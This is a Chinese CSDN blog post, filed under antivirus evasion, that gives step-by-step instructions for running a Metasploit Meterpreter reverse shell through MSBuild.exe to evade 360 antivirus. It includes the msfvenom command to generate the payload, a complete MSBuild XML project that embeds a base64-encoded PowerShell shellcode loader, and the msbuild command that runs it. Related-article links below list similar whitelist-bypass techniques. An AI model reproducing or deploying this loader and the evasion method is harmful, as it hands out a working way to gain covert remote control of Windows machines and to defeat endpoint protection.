MSBuild.exe执⾏payload过360

最新推荐文章于 2024-07-20 17:11:51 发布
最新推荐文章于 2024-07-20 17:11:51 发布
阅读量299 收藏
点赞数
分类专栏: 免杀 文章标签: msbuild 开发工具 windows 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/reaido/article/details/113185555
版权

1、msfvenom生成shellcode,注意⽣成的是psh格式

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2lport=3333 -f psh -o shell.ps1

2、打开生成 shell.ps1 ⽂件,在⽂件最后添加

 for (;;){   
    Start-sleep 60
}

保存一下

3、将修改后的 shell.ps1 ⽂件内容进⾏base64编码

可以使⽤在线平台(⽐如:https://www.sojson.com/base64.html )也可以使⽤其他编码⼯具。

4、把编码后的内容替换到下⾯代码中 cmd = 处,并保存为 shell.xml

<Project ToolsVersion="4.0"
xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <!-- This inline task executes c# code. -->
 <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
 <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
 <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
 <!-- License: BSD 3-Clause -->
 <Target Name="npscsharp">
 <nps />
 </Target>
 <UsingTask
 TaskName="nps"
 TaskFactory="CodeTaskFactory"
 
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
 <Task>
 <Reference Include="System.Management.Automation" />
 <Code Type="Class" Language="cs">
 <![CDATA[
 using System;
 using System.Collections.ObjectModel;
 using System.Management.Automation;
 using System.Management.Automation.Runspaces;
 using Microsoft.Build.Framework;
 using Microsoft.Build.Utilities;
 public class nps : Task, ITask
 {
 public override bool Execute()
 {
 string cmd = 
"JEJGd2JBZ1RQID0gQCIKW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50
UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpOwpbRGxsSW1wb3J0KCJrZXJuZWwzM
i5kbGwiKV0KcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRocmVhZChJbnRQdHIgbHBUaHJlYWRBdHRyaWJ1dGVzLCB1aW50IGR3U3RhY2
tTaXplLCBJbnRQdHIgbHBTdGFydEFkZHJlc3MsIEludFB0ciBscFBhcmFtZXRlciwgdWludCBkd0NyZWF0aW9uRmxhZ3MsIEludFB0ciBscFRocmVhZEl
kKTsKIkAKCiRBWHJmcEp5c2NoZCA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICRCRndiQWdUUCAtTmFtZSAiV2luMzIiIC1uYW1lc3BhY2UgV2lu
MzJGdW5jdGlvbnMgLXBhc3N0aHJ1CgpbQnl0ZVtdXSAkeFJYT0RmR28gPSAweGZjLDB4ZTgsMHg4ZiwweDAsMHgwLDB4MCwweDYwLDB4ODksMHhlNSwwe
DMxLDB4ZDIsMHg2NCwweDhiLDB4NTIsMHgzMCwweDhiLDB4NTIsMHhjLDB4OGIsMHg1MiwweDE0LDB4ZiwweGI3LDB4NGEsMHgyNiwweDhiLDB4NzIsMH
gyOCwweDMxLDB4ZmYsMHgzMSwweGMwLDB4YWMsMHgzYywweDYxLDB4N2MsMHgyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4NDksMHg
3NSwweGVmLDB4NTIsMHg1NywweDhiLDB4NTIsMHgxMCwweDhiLDB4NDIsMHgzYywweDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCww
eDRjLDB4MSwweGQwLDB4OGIsMHg1OCwweDIwLDB4NTAsMHgxLDB4ZDMsMHg4YiwweDQ4LDB4MTgsMHg4NSwweGM5LDB4NzQsMHgzYywweDMxLDB4ZmYsM
Hg0OSwweDhiLDB4MzQsMHg4YiwweDEsMHhkNiwweDMxLDB4YzAsMHhjMSwweGNmLDB4ZCwweGFjLDB4MSwweGM3LDB4MzgsMHhlMCwweDc1LDB4ZjQsMH
gzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTAsMHg1OCwweDhiLDB4NTgsMHgyNCwweDEsMHhkMywweDY2LDB4OGIsMHhjLDB4NGIsMHg
4YiwweDU4LDB4MWMsMHgxLDB4ZDMsMHg4YiwweDQsMHg4YiwweDEsMHhkMCwweDg5LDB4NDQsMHgyNCwweDI0LDB4NWIsMHg1YiwweDYxLDB4NTksMHg1
YSwweDUxLDB4ZmYsMHhlMCwweDU4LDB4NWYsMHg1YSwweDhiLDB4MTIsMHhlOSwweDgwLDB4ZmYsMHhmZiwweGZmLDB4NWQsMHg2OCwweDMzLDB4MzIsM
HgwLDB4MCwweDY4LDB4NzcsMHg3MywweDMyLDB4NWYsMHg1NCwweDY4LDB4NGMsMHg3NywweDI2LDB4NywweDg5LDB4ZTgsMHhmZiwweGQwLDB4YjgsMH
g5MCwweDEsMHgwLDB4MCwweDI5LDB4YzQsMHg1NCwweDUwLDB4NjgsMHgyOSwweDgwLDB4NmIsMHgwLDB4ZmYsMHhkNSwweDZhLDB4YSwweDY4LDB4Mjc
sMHg2OCwweDM4LDB4OGMsMHg2OCwweDIsMHgwLDB4MWIsMHhiYywweDg5LDB4ZTYsMHg1MCwweDUwLDB4NTAsMHg1MCwweDQwLDB4NTAsMHg0MCwweDUw
LDB4NjgsMHhlYSwweGYsMHhkZiwweGUwLDB4ZmYsMHhkNSwweDk3LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDk5LDB4YTUsMHg3NCwweDYxLDB4Z
mYsMHhkNSwweDg1LDB4YzAsMHg3NCwweGEsMHhmZiwweDRlLDB4OCwweDc1LDB4ZWMsMHhlOCwweDY3LDB4MCwweDAsMHgwLDB4NmEsMHgwLDB4NmEsMH
g0LDB4NTYsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdlLDB4MzYsMHg4YiwweDM2LDB4NmEsMHg
0MCwweDY4LDB4MCwweDEwLDB4MCwweDAsMHg1NiwweDZhLDB4MCwweDY4LDB4NTgsMHhhNCwweDUzLDB4ZTUsMHhmZiwweGQ1LDB4OTMsMHg1MywweDZh
LDB4MCwweDU2LDB4NTMsMHg1NywweDY4LDB4MiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHg4MywweGY4LDB4MCwweDdkLDB4MjgsMHg1OCwweDY4L
DB4MCwweDQwLDB4MCwweDAsMHg2YSwweDAsMHg1MCwweDY4LDB4YiwweDJmLDB4ZiwweDMwLDB4ZmYsMHhkNSwweDU3LDB4NjgsMHg3NSwweDZlLDB4NG
QsMHg2MSwweGZmLDB4ZDUsMHg1ZSwweDVlLDB4ZmYsMHhjLDB4MjQsMHhmLDB4ODUsMHg3MCwweGZmLDB4ZmYsMHhmZiwweGU5LDB4OWIsMHhmZiwweGZ
mLDB4ZmYsMHgxLDB4YzMsMHgyOSwweGM2LDB4NzUsMHhjMSwweGMzLDB4YmIsMHhmMCwweGI1LDB4YTIsMHg1NiwweDZhLDB4MCwweDUzLDB4ZmYsMHhk
NQoKCiRjUFBFVFdMS2hXREpCQSA9ICRBWHJmcEp5c2NoZDo6VmlydHVhbEFsbG9jKDAsW01hdGhdOjpNYXgoJHhSWE9EZkdvLkxlbmd0aCwweDEwMDApL
DB4MzAwMCwweDQwKQoKW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Q29weSgkeFJYT0RmR28sMCwkY1BQRVRXTEtoV0RKQk
EsJHhSWE9EZkdvLkxlbmd0aCkKCiRBWHJmcEp5c2NoZDo6Q3JlYXRlVGhyZWFkKDAsMCwkY1BQRVRXTEtoV0RKQkEsMCwwLDApCgpmb3IgKDs7KXsKICA
gU3RhcnQtc2xlZXAgNjAKfQ==";
 PowerShell ps = PowerShell.Create();
 ps.AddScript(Base64Decode(cmd));
 Collection<PSObject> output = null;
 try
 {
 output = ps.Invoke();
 }
 catch(Exception e)
 {
 Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());
 }
 if (output != null)
 {
 foreach (PSObject rtnItem in output)
 {
 Console.WriteLine(rtnItem.ToString());
 }
 }
 return true;
 }
 public static string Base64Encode(string text) {
 return
System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
 }
 public static string Base64Decode(string encodedtext) {
 return
System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
 }
 }
 ]]>
 </Code>
 </Task>
 </UsingTask>
</Project>

5、msf设置监听

6、cmd下命令执行

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe shell.xml
驾马飞雾
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
npm-msbuild:从Node.js运行msbuild.exe
02-11
从运行msbuild.exe。 以下自述文件用作设计指南。 实现在dev分支上进行。 去做 在存储库中搜索待办事项 .eslintrs.js .travis.yml 自述徽章 为什么 npm-msbuild使从node.js(尤其是从npm的package.json)调用...
MSBuildAPICaller:没有MSBuild.exeMSBuild
03-21
该项目的更新版本位于 MSBuildAPICaller没有MSBuild.exeMSBuild如何建立和行步骤1:建立IEShim.cs C:\ Windows \ Microsoft.Net \ Framework \ v4.0.30319 \ csc.exe /reference:"Microsoft.Build.Framework....
监控白名单Msbuild.exepayload
12306小哥
04-13 439
简介 MSBuild.exe(Microsoft Build Engine)是Visual Studio使用的软件构建平台。它采用XML格式的项目文件,定义了各种平台的构建要求和配置。 攻击者可能会使用MSBuild通过受信任的Windows实用程序来代理行代码。.NET 4中引入的MSBuild内联任务功能允许将C#代码插入到XML项目文件中。内联任务MSBuild将编译并行内联任务。MSB...
利用msbuild命令行文件上线CS
热门推荐
Shanfenglan's blog
08-28 25万+
实现效果 原理 Use MSBuild To Do More 可以简单的理解为,windows下的msbuild命令可以行内容为特定格式的文件。在.NET Framework 4.0中支持了一项新功能”Inline Tasks”,被包含在元素UsingTask中,可用来在xml文件中行c#代码。 用途 因为这种方式不限制文件的后缀名,只要内容格式符合要求即可。所以可以几乎所有绕过白名单检测来行shellcode,可在一定程度上达到免杀效果。 文件参考 <Project ToolsVersio
对亮神基于白名单 Msbuild.exe payload 第一季复现
cxk
05-01 709
0x00 MSBuild简介: MSBuild是 Microsoft Build Engine 的缩写,代表 Microsoft 和 Visual Studio 的新的生成平台。MSBuild 在如何处理和生成软件方面是完全透明的,使开发人员能够在未安装Visual Studio 的生成实验室环境中组织和生成产品。MSBuild 引入了一种新的基于 XML 的项目文件格式,这种格式容易理解、易于扩...
使用msbuild.exe绕过应用程序白名单(多种方法)
weixin_30951389的博客
03-07 438
一、MSbuild.exe简介 Microsoft Build Engine是一个用于构建应用程序的平台。此引擎也被称为msbuild,它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中...
shecodject生成免杀木马,一步过360、火绒
box
06-09 1664
gtihub下载和安装 https://github.com/TaroballzChen/shecodject 直接切到setup/ python3 setpu.py 时间有点长,请耐心等待。 使用 python3 shecodject.py 功能介绍 mpr 生成msf有效shellcode mpr run exe 生成shellcode后返回主界面生成 exe文件 run 注意:记得设True,让exe程序运行时不会弹出控制台,若设置为Flase,就会被360查杀。 ...
第七十一课:基于白名单Msbuild.exepayload第一季.docx
09-15
基于白名单Msbuild.exepayload的知识点解析 本资源摘要信息将基于给定的文件信息,详细解析基于白名单Msbuild.exepayload的知识点。 MSBuild概述 MSBuild是Microsoft Build Engine的缩写,代表Microsoft...
NoMSBuild:没有MSbuild.exeMSBuild
04-22
没有MSbuild.exeMSBuild。 从此处使用D / Invoke示例进行Shellcode注入: ://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0 指示 替换buildit.csproj中的base64 shellcode,进程路径和AssemblyFile...
MSBuildShell, MSBuildShell,在 MSBuild.exe 中运行的Powershell主机.zip
09-17
MSBuildShell, MSBuildShell,在 MSBuild.exe 中运行的Powershell主机 MSBuildShell,在 MSBuild.exe 中运行的Powershell主机这个代码让我们绕过应用程序白名单和 Powershell.exe 限制,并提供一个几乎看起来像普通...
Windows安装go语言开发环境
最新发布
doubiy的博客
07-20 269
然后重新安装这些插件(重新安装插件的触发方式:安装失败后有可能会重新在右下角弹出安装插件的提示;这些插件的作用是,对go语言代码的合法性检查以及提示(比如提示有哪些方法可以使用、保存时自动导入没有导入的包、去除没有使用的包(没有使用的包导入后会不合法)等等)这里安装插件时,由于需要使用国外的网络,可能会失败,那么最简单的解决方案就是设置go语言环境变量中的proxy为国内的代理地址。当我们用vscode写go语言代码时,会在vscode的右下角弹出安装相关插件的提示,那么全部安装即可。正常显示则安装完成。
VS2022安装保姆级教程
m0_62599305的博客
07-16 896
Visual Studio 2022(VS2022)是微软推出的一款功能强大的集成开发环境(IDE),广泛应用于C++、C#、Python等多种编程语言的开发。对于初学者和专业开发者来说,安装和配置VS2022是迈向高效开发的第一步。本教程将详细介绍如何在Windows系统上安装VS2022,确保每一个步骤都清晰易懂,帮助你顺利完成安装过程。Visual Studio 2022(VS2022)是微软推出的一款功能强大的集成开发环境(IDE),广泛应用于C++、C#、Python等多种编程语言的开发。
使用Dockerfile构建镜像
2402_83805984的博客
07-16 394
【代码】使用Dockerfile构建镜像。
idea 查看 多少字节
狼魂之力
07-17 98
jclasslib 装这个插件。
SpringBoot使用开发环境的application.properties
培根芝士的专栏
07-16 423
在Spring Boot项目中,application.properties 或 application.yml 文件是用于配置应用程序外部属性的重要文件。这些文件允许定制你的应用,而无需更改代码。根据不同的运行环境,可以通过创建以application-{profile}.properties格式命名的文件来定义不同环境的配置,其中{profile}是环境标识,如test(测试)、dev(开发)、prod(生产)等。
IDEA自带的Maven 3.9.x无法刷新http nexus私服
Devin's Blog
07-17 586
IDEA自带的Maven 3.9.x无法刷新http nexus私服
【ubuntu】代理设置总结,最近在代理这里踩了很多坑,大致理解了linux的代理机制
weixin_41899098的博客
07-16 241
1. 代理软件需要使用系统代理 2. 系统代理可以在界面设置(但是socks类型无法使用socks5) 3. 所以推荐使用 配置文件的方式 4. sudo vim /etc/environment 5. 设置为以下内容:all_proxy=“socks5://127.0.0.1:7890” 6. 就不用一个一个设置http,https等类型的代理了 7. 此外,.bashrc 也可以设置代理(当前用户生效)export all_proxy=“socks5://127.0.0.1:7890” 8. 也可以在终
IDEA创建Java工程、Maven安装与建立工程、Web工程、Tomcat配置
buyaotutou的博客
07-18 894
例如:第一章 Python 机器学习入门之pandas的使用。
MSBuild.exe
08-17
MSBuild.exe是一个命令行工具,用于构建和部署.NET应用程序。它是Microsoft Build Engine (MSBuild)的一部分,用于处理项目文件和行构建操作。 MSBuild.exe可以使用命令行参数来指定要构建的项目文件、所使用的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值